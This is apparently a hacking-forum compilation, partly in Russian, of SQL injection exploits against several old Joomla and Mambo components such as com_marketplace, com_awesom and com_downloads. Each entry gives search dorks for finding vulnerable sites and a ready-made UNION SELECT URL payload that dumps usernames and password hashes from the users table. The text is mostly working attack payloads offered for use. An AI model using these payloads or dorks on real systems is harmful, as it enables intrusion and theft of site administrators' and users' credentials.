Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit
Автор: SoSo H H (Iraqi-Cracker)
Tested on: Markplace Version 1.1.1 and 1.1.1-pl1
Поиск бажного компонента:
"Marketplace Version 1.1.1"
"Marketplace Version 1.1.1-pl1"
inurl:index.php?option=com_marketplace
Exploit:
Код:
index.php?option=com_marketplace&page=show_category&catid=(SQL)
Пример:
Код:
(SQL)=-1+union+select+concat(username,0x3a,password),2,3+from+jos_users/*
milw0rm.com [2008-02-03]
----------------------------------------------------
HOME : http://www.hackturkiye.com/
AUTHOR : S@BUN :
joomla SQL Injection(com_awesom)
DORKS 1: allinurl :"com_awesom"
EXPLOIT:
Код:
index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*
Код:
<name>Awesom</name>
<creationDate>24/05/2004</creationDate>
<author>Madd0</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>madd0@users.sourceforge.net</authorEmail>
<authorUrl>amazoop.sourceforge.net</authorUrl>
<version>0.3.2</version>
<description>Awesom!, or Amazon Web Services for Opensource Mambo, is a component that lets you create lists of products to feature on your Mambo-driven site.<br />
These lists can be customized or can be automatically generated with information provided by Amazon through Amazon Web Services.<br />
Additionally, if you are an Amazon associate, you can configure Awesom to link to Amazon
using your associate ID in order to earn comissions.
</description>
milw0rm
joomla SQL Injection(com_shambo2)
DORKS 1: allinurl :"com_shambo2"
EXPLOIT:
Код:
index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users
milw0rm
joomla SQL Injection(com_downloads)(filecatid)
DORKS 1: allinurl :"com_downloads"filecatid
EXPLOIT:
Код:
index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
milw0rm
Joomla Component Ynews 1.0.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
Код:
/index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1/* */union/**/select/**/0,1,2,username,password,5,6%20from%20jos_users/*
xakep.ru